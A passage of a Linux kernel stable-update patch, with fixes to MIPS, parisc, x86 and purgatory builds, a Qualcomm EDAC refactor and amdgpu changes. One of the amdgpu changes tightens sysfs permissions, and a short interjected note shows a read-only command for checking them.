++	wmb(); /* force doorbell write out to dma engine */
+ 
+ 	/* Get next descriptor pointer. */
+ 	ctp->put_ptr = phys_to_virt(DSCR_GET_NXTPTR(dp->dscr_nxtptr));
+diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c
+index 7ddf07f255f32..6f5d825958778 100644
+--- a/arch/mips/kernel/cpu-probe.c
++++ b/arch/mips/kernel/cpu-probe.c
+@@ -1502,6 +1502,10 @@ static inline void cpu_probe_alchemy(struct cpuinfo_mips *c, unsigned int cpu)
+ 			break;
+ 		}
+ 		break;
++	case PRID_IMP_NETLOGIC_AU13XX:
++		c->cputype = CPU_ALCHEMY;
++		__cpu_name[cpu] = "Au1300";
++		break;
+ 	}
+ }
+ 
+@@ -1861,6 +1865,7 @@ void cpu_probe(void)
+ 		cpu_probe_mips(c, cpu);
+ 		break;
+ 	case PRID_COMP_ALCHEMY:
++	case PRID_COMP_NETLOGIC:
+ 		cpu_probe_alchemy(c, cpu);
+ 		break;
+ 	case PRID_COMP_SIBYTE:
+diff --git a/arch/mips/kernel/setup.c b/arch/mips/kernel/setup.c
+index f1c88f8a1dc51..81dbb4ef52317 100644
+--- a/arch/mips/kernel/setup.c
++++ b/arch/mips/kernel/setup.c
+@@ -158,10 +158,6 @@ static unsigned long __init init_initrd(void)
+ 		pr_err("initrd start must be page aligned\n");
+ 		goto disable;
+ 	}
+-	if (initrd_start < PAGE_OFFSET) {
+-		pr_err("initrd start < PAGE_OFFSET\n");
+-		goto disable;
+-	}
+ 
+ 	/*
+ 	 * Sanitize initrd addresses. For example firmware
+@@ -174,6 +170,11 @@ static unsigned long __init init_initrd(void)
+ 	initrd_end = (unsigned long)__va(end);
+ 	initrd_start = (unsigned long)__va(__pa(initrd_start));
+ 
++	if (initrd_start < PAGE_OFFSET) {
++		pr_err("initrd start < PAGE_OFFSET\n");
++		goto disable;
++	}
++
+ 	ROOT_DEV = Root_RAM0;
+ 	return PFN_UP(end);
+ disable:
+diff --git a/arch/mips/loongson2ef/Platform b/arch/mips/loongson2ef/Platform
+index eebabf9df6ac0..c6f7a4b959978 100644
+--- a/arch/mips/loongson2ef/Platform
++++ b/arch/mips/loongson2ef/Platform
+@@ -25,7 +25,7 @@ cflags-$(CONFIG_CPU_LOONGSON2F) += -march=loongson2f
+ # binutils does not merge support for the flag then we can revisit & remove
+ # this later - for now it ensures vendor toolchains don't cause problems.
+ #
+-cflags-$(CONFIG_CPU_LOONGSON2EF)	+= $(call as-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
++cflags-$(CONFIG_CPU_LOONGSON2EF)	+= $(call cc-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+ 
+ # Enable the workarounds for Loongson2f
+ ifdef CONFIG_CPU_LOONGSON2F_WORKAROUNDS
+diff --git a/arch/nios2/boot/dts/10m50_devboard.dts b/arch/nios2/boot/dts/10m50_devboard.dts
+index 56339bef3247d..0e7e5b0dd685c 100644
+--- a/arch/nios2/boot/dts/10m50_devboard.dts
++++ b/arch/nios2/boot/dts/10m50_devboard.dts
+@@ -97,7 +97,7 @@
+ 			rx-fifo-depth = <8192>;
+ 			tx-fifo-depth = <8192>;
+ 			address-bits = <48>;
+-			max-frame-size = <1518>;
++			max-frame-size = <1500>;
+ 			local-mac-address = [00 00 00 00 00 00];
+ 			altr,has-supplementary-unicast;
+ 			altr,enable-sup-addr = <1>;
+diff --git a/arch/nios2/boot/dts/3c120_devboard.dts b/arch/nios2/boot/dts/3c120_devboard.dts
+index d10fb81686c7e..3ee3169063797 100644
+--- a/arch/nios2/boot/dts/3c120_devboard.dts
++++ b/arch/nios2/boot/dts/3c120_devboard.dts
+@@ -106,7 +106,7 @@
+ 				interrupt-names = "rx_irq", "tx_irq";
+ 				rx-fifo-depth = <8192>;
+ 				tx-fifo-depth = <8192>;
+-				max-frame-size = <1518>;
++				max-frame-size = <1500>;
+ 				local-mac-address = [ 00 00 00 00 00 00 ];
+ 				phy-mode = "rgmii-id";
+ 				phy-handle = <&phy0>;
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 0f0d4a496fef0..75677b526b2bb 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -90,10 +90,6 @@
+ #include <asm/asmregs.h>
+ #include <asm/psw.h>
+ 
+-	sp	=	30
+-	gp	=	27
+-	ipsw	=	22
+-
+ 	/*
+ 	 * We provide two versions of each macro to convert from physical
+ 	 * to virtual and vice versa. The "_r1" versions take one argument
+diff --git a/arch/parisc/kernel/pci-dma.c b/arch/parisc/kernel/pci-dma.c
+index ba87f791323be..71ed5391f29d6 100644
+--- a/arch/parisc/kernel/pci-dma.c
++++ b/arch/parisc/kernel/pci-dma.c
+@@ -446,11 +446,27 @@ void arch_dma_free(struct device *dev, size_t size, void *vaddr,
+ void arch_sync_dma_for_device(phys_addr_t paddr, size_t size,
+ 		enum dma_data_direction dir)
+ {
++	/*
++	 * fdc: The data cache line is written back to memory, if and only if
++	 * it is dirty, and then invalidated from the data cache.
++	 */
+ 	flush_kernel_dcache_range((unsigned long)phys_to_virt(paddr), size);
+ }
+ 
+ void arch_sync_dma_for_cpu(phys_addr_t paddr, size_t size,
+ 		enum dma_data_direction dir)
+ {
+-	flush_kernel_dcache_range((unsigned long)phys_to_virt(paddr), size);
++	unsigned long addr = (unsigned long) phys_to_virt(paddr);
++
++	switch (dir) {
++	case DMA_TO_DEVICE:
++	case DMA_BIDIRECTIONAL:
++		flush_kernel_dcache_range(addr, size);
++		return;
++	case DMA_FROM_DEVICE:
++		purge_kernel_dcache_range_asm(addr, addr + size);
++		return;
++	default:
++		BUG();
++	}
+ }
+diff --git a/arch/powerpc/purgatory/Makefile b/arch/powerpc/purgatory/Makefile
+index a81d155b89aed..df50b155c7672 100644
+--- a/arch/powerpc/purgatory/Makefile
++++ b/arch/powerpc/purgatory/Makefile
+@@ -4,6 +4,11 @@ KASAN_SANITIZE := n
+ 
+ targets += trampoline_$(BITS).o purgatory.ro
+ 
++# When profile-guided optimization is enabled, llvm emits two different
++# overlapping text sections, which is not supported by kexec. Remove profile
++# optimization flags.
++KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
++
+ LDFLAGS_purgatory.ro := -e purgatory_start -r --no-undefined
+ 
+ $(obj)/purgatory.ro: $(obj)/trampoline_$(BITS).o FORCE
+diff --git a/arch/riscv/purgatory/Makefile b/arch/riscv/purgatory/Makefile
+index 659e21862077b..6574c91c99b14 100644
+--- a/arch/riscv/purgatory/Makefile
++++ b/arch/riscv/purgatory/Makefile
+@@ -25,6 +25,11 @@ CFLAGS_sha256.o := -D__DISABLE_EXPORTS
+ CFLAGS_string.o := -D__DISABLE_EXPORTS
+ CFLAGS_ctype.o := -D__DISABLE_EXPORTS
+ 
++# When profile-guided optimization is enabled, llvm emits two different
++# overlapping text sections, which is not supported by kexec. Remove profile
++# optimization flags.
++KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
++
+ # When linking purgatory.ro with -r unresolved symbols are not checked,
+ # also link a purgatory.chk binary without -r to check for unresolved symbols.
+ PURGATORY_LDFLAGS := -e purgatory_start -z nodefaultlib
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 3a261abb6d158..15b7b403a4bd0 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -50,7 +50,7 @@ KBUILD_CFLAGS += $(call cc-option,-fmacro-prefix-map=$(srctree)/=)
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ KBUILD_CFLAGS += -D__DISABLE_EXPORTS
+ # Disable relocation relaxation in case the link is not PIE.
+-KBUILD_CFLAGS += $(call as-option,-Wa$(comma)-mrelax-relocations=no)
++KBUILD_CFLAGS += $(call cc-option,-Wa$(comma)-mrelax-relocations=no)
+ KBUILD_CFLAGS += -include $(srctree)/include/linux/hidden.h
+ 
+ # sev.c indirectly inludes inat-table.h which is generated during
+diff --git a/arch/x86/kernel/head_64.S b/arch/x86/kernel/head_64.S
+index d860d437631b6..998cdb112b725 100644
+--- a/arch/x86/kernel/head_64.S
++++ b/arch/x86/kernel/head_64.S
+@@ -85,6 +85,15 @@ SYM_CODE_START_NOALIGN(startup_64)
+ 	call	startup_64_setup_env
+ 	popq	%rsi
+ 
++	/* Now switch to __KERNEL_CS so IRET works reliably */
++	pushq	$__KERNEL_CS
++	leaq	.Lon_kernel_cs(%rip), %rax
++	pushq	%rax
++	lretq
++
++.Lon_kernel_cs:
++	UNWIND_HINT_EMPTY
++
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	/*
+ 	 * Activate SEV/SME memory encryption if supported/enabled. This needs to
+@@ -98,15 +107,6 @@ SYM_CODE_START_NOALIGN(startup_64)
+ 	popq	%rsi
+ #endif
+ 
+-	/* Now switch to __KERNEL_CS so IRET works reliably */
+-	pushq	$__KERNEL_CS
+-	leaq	.Lon_kernel_cs(%rip), %rax
+-	pushq	%rax
+-	lretq
+-
+-.Lon_kernel_cs:
+-	UNWIND_HINT_EMPTY
+-
+ 	/* Sanitize CPU configuration */
+ 	call verify_cpu
+ 
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 82fec66d46d29..42abd6af11984 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -14,6 +14,11 @@ $(obj)/sha256.o: $(srctree)/lib/crypto/sha256.c FORCE
+ 
+ CFLAGS_sha256.o := -D__DISABLE_EXPORTS
+ 
++# When profile-guided optimization is enabled, llvm emits two different
++# overlapping text sections, which is not supported by kexec. Remove profile
++# optimization flags.
++KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
++
+ # When linking purgatory.ro with -r unresolved symbols are not checked,
+ # also link a purgatory.chk binary without -r to check for unresolved symbols.
+ PURGATORY_LDFLAGS := -e purgatory_start -z nodefaultlib
+diff --git a/drivers/block/xen-blkfront.c b/drivers/block/xen-blkfront.c
+index 35b9bcad9db90..5ddf393aa390f 100644
+--- a/drivers/block/xen-blkfront.c
++++ b/drivers/block/xen-blkfront.c
+@@ -780,7 +780,8 @@ static int blkif_queue_rw_req(struct request *req, struct blkfront_ring_info *ri
+ 		ring_req->u.rw.handle = info->handle;
+ 		ring_req->operation = rq_data_dir(req) ?
+ 			BLKIF_OP_WRITE : BLKIF_OP_READ;
+-		if (req_op(req) == REQ_OP_FLUSH || req->cmd_flags & REQ_FUA) {
++		if (req_op(req) == REQ_OP_FLUSH ||
++		    (req_op(req) == REQ_OP_WRITE && (req->cmd_flags & REQ_FUA))) {
+ 			/*
+ 			 * Ideally we can do an unordered flush-to-disk.
+			 * In case the backend only supports barriers, use that.
+diff --git a/drivers/char/agp/parisc-agp.c b/drivers/char/agp/parisc-agp.c
+index d68d05d5d3838..514f9f287a781 100644
+--- a/drivers/char/agp/parisc-agp.c
++++ b/drivers/char/agp/parisc-agp.c
+@@ -90,6 +90,9 @@ parisc_agp_tlbflush(struct agp_memory *mem)
+ {
+ 	struct _parisc_agp_info *info = &parisc_agp_info;
+ 
++	/* force fdc ops to be visible to IOMMU */
++	asm_io_sync();
++
+ 	writeq(info->gart_base | ilog2(info->gart_size), info->ioc_regs+IOC_PCOM);
+ 	readq(info->ioc_regs+IOC_PCOM);	/* flush */
+ }
+@@ -158,6 +161,7 @@ parisc_agp_insert_memory(struct agp_memory *mem, off_t pg_start, int type)
+ 			info->gatt[j] =
+ 				parisc_agp_mask_memory(agp_bridge,
+ 					paddr, type);
++			asm_io_fdc(&info->gatt[j]);
+ 		}
+ 	}
+ 
+@@ -191,7 +195,16 @@ static unsigned long
+ parisc_agp_mask_memory(struct agp_bridge_data *bridge, dma_addr_t addr,
+ 		       int type)
+ {
+-	return SBA_PDIR_VALID_BIT | addr;
++	unsigned ci;			/* coherent index */
++	dma_addr_t pa;
++
++	pa = addr & IOVP_MASK;
++	asm("lci 0(%1), %0" : "=r" (ci) : "r" (phys_to_virt(pa)));
++
++	pa |= (ci >> PAGE_SHIFT) & 0xff;/* move CI (8 bits) into lowest byte */
++	pa |= SBA_PDIR_VALID_BIT;	/* set "valid" bit */
++
++	return cpu_to_le64(pa);
+ }
+ 
+ static void
+diff --git a/drivers/clk/pxa/clk-pxa3xx.c b/drivers/clk/pxa/clk-pxa3xx.c
+index 42958a5426625..621e298f101a0 100644
+--- a/drivers/clk/pxa/clk-pxa3xx.c
++++ b/drivers/clk/pxa/clk-pxa3xx.c
+@@ -164,7 +164,7 @@ void pxa3xx_clk_update_accr(u32 disable, u32 enable, u32 xclkcfg, u32 mask)
+ 	accr &= ~disable;
+ 	accr |= enable;
+ 
+-	writel(accr, ACCR);
++	writel(accr, clk_regs + ACCR);
+ 	if (xclkcfg)
+ 		__asm__("mcr p14, 0, %0, c6, c0, 0\n" : : "r"(xclkcfg));
+ 
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index 2c91ceff8a9ca..518092d7eaf73 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -21,30 +21,9 @@
+ #define TRP_SYN_REG_CNT                 6
+ #define DRP_SYN_REG_CNT                 8
+ 
+-#define LLCC_COMMON_STATUS0             0x0003000c
+ #define LLCC_LB_CNT_MASK                GENMASK(31, 28)
+ #define LLCC_LB_CNT_SHIFT               28
+ 
+-/* Single & double bit syndrome register offsets */
+-#define TRP_ECC_SB_ERR_SYN0             0x0002304c
+-#define TRP_ECC_DB_ERR_SYN0             0x00020370
+-#define DRP_ECC_SB_ERR_SYN0             0x0004204c
+-#define DRP_ECC_DB_ERR_SYN0             0x00042070
+-
+-/* Error register offsets */
+-#define TRP_ECC_ERROR_STATUS1           0x00020348
+-#define TRP_ECC_ERROR_STATUS0           0x00020344
+-#define DRP_ECC_ERROR_STATUS1           0x00042048
+-#define DRP_ECC_ERROR_STATUS0           0x00042044
+-
+-/* TRP, DRP interrupt register offsets */
+-#define DRP_INTERRUPT_STATUS            0x00041000
+-#define TRP_INTERRUPT_0_STATUS          0x00020480
+-#define DRP_INTERRUPT_CLEAR             0x00041008
+-#define DRP_ECC_ERROR_CNTR_CLEAR        0x00040004
+-#define TRP_INTERRUPT_0_CLEAR           0x00020484
+-#define TRP_ECC_ERROR_CNTR_CLEAR        0x00020440
+-
+ /* Mask and shift macros */
+ #define ECC_DB_ERR_COUNT_MASK           GENMASK(4, 0)
+ #define ECC_DB_ERR_WAYS_MASK            GENMASK(31, 16)
+@@ -60,15 +39,6 @@
+ #define DRP_TRP_INT_CLEAR               GENMASK(1, 0)
+ #define DRP_TRP_CNT_CLEAR               GENMASK(1, 0)
+ 
+-/* Config registers offsets*/
+-#define DRP_ECC_ERROR_CFG               0x00040000
+-
+-/* Tag RAM, Data RAM interrupt register offsets */
+-#define CMN_INTERRUPT_0_ENABLE          0x0003001c
+-#define CMN_INTERRUPT_2_ENABLE          0x0003003c
+-#define TRP_INTERRUPT_0_ENABLE          0x00020488
+-#define DRP_INTERRUPT_ENABLE            0x0004100c
+-
+ #define SB_ERROR_THRESHOLD              0x1
+ #define SB_ERROR_THRESHOLD_SHIFT        24
+ #define SB_DB_TRP_INTERRUPT_ENABLE      0x3
+@@ -88,9 +58,6 @@ enum {
+ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	[LLCC_DRAM_CE] = {
+ 		.name = "DRAM Single-bit",
+-		.synd_reg = DRP_ECC_SB_ERR_SYN0,
+-		.count_status_reg = DRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = DRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = DRP_SYN_REG_CNT,
+ 		.count_mask = ECC_SB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_SB_ERR_WAYS_MASK,
+@@ -98,9 +65,6 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ 	[LLCC_DRAM_UE] = {
+ 		.name = "DRAM Double-bit",
+-		.synd_reg = DRP_ECC_DB_ERR_SYN0,
+-		.count_status_reg = DRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = DRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = DRP_SYN_REG_CNT,
+ 		.count_mask = ECC_DB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_DB_ERR_WAYS_MASK,
+@@ -108,9 +72,6 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ 	[LLCC_TRAM_CE] = {
+ 		.name = "TRAM Single-bit",
+-		.synd_reg = TRP_ECC_SB_ERR_SYN0,
+-		.count_status_reg = TRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = TRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = TRP_SYN_REG_CNT,
+ 		.count_mask = ECC_SB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_SB_ERR_WAYS_MASK,
+@@ -118,9 +79,6 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ 	[LLCC_TRAM_UE] = {
+ 		.name = "TRAM Double-bit",
+-		.synd_reg = TRP_ECC_DB_ERR_SYN0,
+-		.count_status_reg = TRP_ECC_ERROR_STATUS1,
+-		.ways_status_reg = TRP_ECC_ERROR_STATUS0,
+ 		.reg_cnt = TRP_SYN_REG_CNT,
+ 		.count_mask = ECC_DB_ERR_COUNT_MASK,
+ 		.ways_mask = ECC_DB_ERR_WAYS_MASK,
+@@ -128,7 +86,7 @@ static const struct llcc_edac_reg_data edac_reg_data[] = {
+ 	},
+ };
+ 
+-static int qcom_llcc_core_setup(struct regmap *llcc_bcast_regmap)
++static int qcom_llcc_core_setup(struct llcc_drv_data *drv, struct regmap *llcc_bcast_regmap)
+ {
+ 	u32 sb_err_threshold;
+ 	int ret;
+@@ -137,31 +95,31 @@ static int qcom_llcc_core_setup(struct regmap *llcc_bcast_regmap)
+ 	 * Configure interrupt enable registers such that Tag, Data RAM related
+ 	 * interrupts are propagated to interrupt controller for servicing
+ 	 */
+-	ret = regmap_update_bits(llcc_bcast_regmap, CMN_INTERRUPT_2_ENABLE,
++	ret = regmap_update_bits(llcc_bcast_regmap, drv->edac_reg_offset->cmn_interrupt_2_enable,
+ 				 TRP0_INTERRUPT_ENABLE,
+ 				 TRP0_INTERRUPT_ENABLE);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = regmap_update_bits(llcc_bcast_regmap, TRP_INTERRUPT_0_ENABLE,
++	ret = regmap_update_bits(llcc_bcast_regmap, drv->edac_reg_offset->trp_interrupt_0_enable,
+ 				 SB_DB_TRP_INTERRUPT_ENABLE,
+ 				 SB_DB_TRP_INTERRUPT_ENABLE);
+ 	if (ret)
+ 		return ret;
+ 
+ 	sb_err_threshold = (SB_ERROR_THRESHOLD << SB_ERROR_THRESHOLD_SHIFT);
+-	ret = regmap_write(llcc_bcast_regmap, DRP_ECC_ERROR_CFG,
++	ret = regmap_write(llcc_bcast_regmap, drv->edac_reg_offset->drp_ecc_error_cfg,
+ 			   sb_err_threshold);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = regmap_update_bits(llcc_bcast_regmap, CMN_INTERRUPT_2_ENABLE,
++	ret = regmap_update_bits(llcc_bcast_regmap, drv->edac_reg_offset->cmn_interrupt_2_enable,
+ 				 DRP0_INTERRUPT_ENABLE,
+ 				 DRP0_INTERRUPT_ENABLE);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = regmap_write(llcc_bcast_regmap, DRP_INTERRUPT_ENABLE,
++	ret = regmap_write(llcc_bcast_regmap, drv->edac_reg_offset->drp_interrupt_enable,
+ 			   SB_DB_DRP_INTERRUPT_ENABLE);
+ 	return ret;
+ }
+@@ -175,24 +133,28 @@ qcom_llcc_clear_error_status(int err_type, struct llcc_drv_data *drv)
+ 	switch (err_type) {
+ 	case LLCC_DRAM_CE:
+ 	case LLCC_DRAM_UE:
+-		ret = regmap_write(drv->bcast_regmap, DRP_INTERRUPT_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->drp_interrupt_clear,
+ 				   DRP_TRP_INT_CLEAR);
+ 		if (ret)
+ 			return ret;
+ 
+-		ret = regmap_write(drv->bcast_regmap, DRP_ECC_ERROR_CNTR_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->drp_ecc_error_cntr_clear,
+ 				   DRP_TRP_CNT_CLEAR);
+ 		if (ret)
+ 			return ret;
+ 		break;
+ 	case LLCC_TRAM_CE:
+ 	case LLCC_TRAM_UE:
+-		ret = regmap_write(drv->bcast_regmap, TRP_INTERRUPT_0_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->trp_interrupt_0_clear,
+ 				   DRP_TRP_INT_CLEAR);
+ 		if (ret)
+ 			return ret;
+ 
+-		ret = regmap_write(drv->bcast_regmap, TRP_ECC_ERROR_CNTR_CLEAR,
++		ret = regmap_write(drv->bcast_regmap,
++				   drv->edac_reg_offset->trp_ecc_error_cntr_clear,
+ 				   DRP_TRP_CNT_CLEAR);
+ 		if (ret)
+ 			return ret;
+@@ -205,17 +167,55 @@ qcom_llcc_clear_error_status(int err_type, struct llcc_drv_data *drv)
+ 	return ret;
+ }
+ 
++struct qcom_llcc_syn_regs {
++	u32 synd_reg;
++	u32 count_status_reg;
++	u32 ways_status_reg;
++};
++
++static void get_reg_offsets(struct llcc_drv_data *drv, int err_type,
++			    struct qcom_llcc_syn_regs *syn_regs)
++{
++	const struct llcc_edac_reg_offset *edac_reg_offset = drv->edac_reg_offset;
++
++	switch (err_type) {
++	case LLCC_DRAM_CE:
++		syn_regs->synd_reg = edac_reg_offset->drp_ecc_sb_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->drp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->drp_ecc_error_status0;
++		break;
++	case LLCC_DRAM_UE:
++		syn_regs->synd_reg = edac_reg_offset->drp_ecc_db_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->drp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->drp_ecc_error_status0;
++		break;
++	case LLCC_TRAM_CE:
++		syn_regs->synd_reg = edac_reg_offset->trp_ecc_sb_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->trp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->trp_ecc_error_status0;
++		break;
++	case LLCC_TRAM_UE:
++		syn_regs->synd_reg = edac_reg_offset->trp_ecc_db_err_syn0;
++		syn_regs->count_status_reg = edac_reg_offset->trp_ecc_error_status1;
++		syn_regs->ways_status_reg = edac_reg_offset->trp_ecc_error_status0;
++		break;
++	}
++}
++
+ /* Dump Syndrome registers data for Tag RAM, Data RAM bit errors*/
+ static int
+ dump_syn_reg_values(struct llcc_drv_data *drv, u32 bank, int err_type)
+ {
+ 	struct llcc_edac_reg_data reg_data = edac_reg_data[err_type];
++	struct qcom_llcc_syn_regs regs = { };
+ 	int err_cnt, err_ways, ret, i;
+ 	u32 synd_reg, synd_val;
+ 
++	get_reg_offsets(drv, err_type, &regs);
++
+ 	for (i = 0; i < reg_data.reg_cnt; i++) {
+-		synd_reg = reg_data.synd_reg + (i * 4);
+-		ret = regmap_read(drv->regmap, drv->offsets[bank] + synd_reg,
++		synd_reg = regs.synd_reg + (i * 4);
++		ret = regmap_read(drv->regmaps[bank], synd_reg,
+ 				  &synd_val);
+ 		if (ret)
+ 			goto clear;
+@@ -224,8 +224,7 @@ dump_syn_reg_values(struct llcc_drv_data *drv, u32 bank, int err_type)
+ 			    reg_data.name, i, synd_val);
+ 	}
+ 
+-	ret = regmap_read(drv->regmap,
+-			  drv->offsets[bank] + reg_data.count_status_reg,
++	ret = regmap_read(drv->regmaps[bank], regs.count_status_reg,
+ 			  &err_cnt);
+ 	if (ret)
+ 		goto clear;
+@@ -235,8 +234,7 @@ dump_syn_reg_values(struct llcc_drv_data *drv, u32 bank, int err_type)
+ 	edac_printk(KERN_CRIT, EDAC_LLCC, "%s: Error count: 0x%4x\n",
+ 		    reg_data.name, err_cnt);
+ 
+-	ret = regmap_read(drv->regmap,
+-			  drv->offsets[bank] + reg_data.ways_status_reg,
++	ret = regmap_read(drv->regmaps[bank], regs.ways_status_reg,
+ 			  &err_ways);
+ 	if (ret)
+ 		goto clear;
+@@ -297,8 +295,7 @@ static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 
+ 	/* Iterate over the banks and look for Tag RAM or Data RAM errors */
+ 	for (i = 0; i < drv->num_banks; i++) {
+-		ret = regmap_read(drv->regmap,
+-				  drv->offsets[i] + DRP_INTERRUPT_STATUS,
++		ret = regmap_read(drv->regmaps[i], drv->edac_reg_offset->drp_interrupt_status,
+ 				  &drp_error);
+ 
+ 		if (!ret && (drp_error & SB_ECC_ERROR)) {
+@@ -313,8 +310,7 @@ static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 		if (!ret)
+ 			irq_rc = IRQ_HANDLED;
+ 
+-		ret = regmap_read(drv->regmap,
+-				  drv->offsets[i] + TRP_INTERRUPT_0_STATUS,
++		ret = regmap_read(drv->regmaps[i], drv->edac_reg_offset->trp_interrupt_0_status,
+ 				  &trp_error);
+ 
+ 		if (!ret && (trp_error & SB_ECC_ERROR)) {
+@@ -346,7 +342,7 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	int ecc_irq;
+ 	int rc;
+ 
+-	rc = qcom_llcc_core_setup(llcc_driv_data->bcast_regmap);
++	rc = qcom_llcc_core_setup(llcc_driv_data, llcc_driv_data->bcast_regmap);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index 1a06b8d724f39..dd6f9ae6fbe9f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -1214,7 +1214,6 @@ amdgpu_display_user_framebuffer_create(struct drm_device *dev,
+ 
+ const struct drm_mode_config_funcs amdgpu_mode_funcs = {
+ 	.fb_create = amdgpu_display_user_framebuffer_create,
+-	.output_poll_changed = drm_fb_helper_output_poll_changed,
+ };
+ 
+ static const struct drm_prop_enum_list amdgpu_underscan_enum_list[] =
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 88a9ece7f4647..49a023f59b2fc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -1605,6 +1605,7 @@ static const u16 amdgpu_unsupported_pciidlist[] = {
+ 	0x5874,
+ 	0x5940,
+ 	0x5941,
++	0x5b70,
+ 	0x5b72,
+ 	0x5b73,
+ 	0x5b74,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 3b8825a3e2336..a3cd816f98a14 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -3550,6 +3550,9 @@ static ssize_t amdgpu_psp_vbflash_read(struct file *filp, struct kobject *kobj,
+ 	void *fw_pri_cpu_addr;
+ 	int ret;
+ 
++	if (adev->psp.vbflash_image_size == 0)
++		return -EINVAL;
++
+ 	dev_info(adev->dev, "VBIOS flash to PSP started");
+ 
+ 	ret = amdgpu_bo_create_kernel(adev, adev->psp.vbflash_image_size,
+@@ -3601,13 +3604,13 @@ static ssize_t amdgpu_psp_vbflash_status(struct device *dev,
+ }
+ 
+ static const struct bin_attribute psp_vbflash_bin_attr = {
+-	.attr = {.name = "psp_vbflash", .mode = 0664},
++	.attr = {.name = "psp_vbflash", .mode = 0660},
+ 	.size = 0,
+ 	.write = amdgpu_psp_vbflash_write,
+ 	.read = amdgpu_psp_vbflash_read,
+ };
+ 
+-static DEVICE_ATTR(psp_vbflash_status, 0444, amdgpu_psp_vbflash_status, NULL);
++static DEVICE_ATTR(psp_vbflash_status, 0440, amdgpu_psp_vbflash_status, NULL);
+ 
+ int amdgpu_psp_sysfs_init(struct amdgpu_device *adev)
+ {
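The mode changes (0664 to 0660, 0444 to 0440) drop world access to the
flash interface. On a running system the effective permissions can be
inspected with something like (sysfs path assumed):

    stat -c '%a %U:%G %n' /sys/bus/pci/devices/*/psp_vbflash_status 2>/dev/null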
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+index 2127aab74a68f..84a36b50ddd87 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+@@ -6969,8 +6969,10 @@ static int gfx_v10_0_kiq_resume(struct amdgpu_device *adev)
+ 		return r;
+ 
+ 	r = amdgpu_bo_kmap(ring->mqd_obj, (void **)&ring->mqd_ptr);
+-	if (unlikely(r != 0))
++	if (unlikely(r != 0)) {
++		amdgpu_bo_unreserve(ring->mqd_obj);
+ 		return r;
++	}
+ 
+ 	gfx_v10_0_kiq_init_queue(ring);
+ 	amdgpu_bo_kunmap(ring->mqd_obj);
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
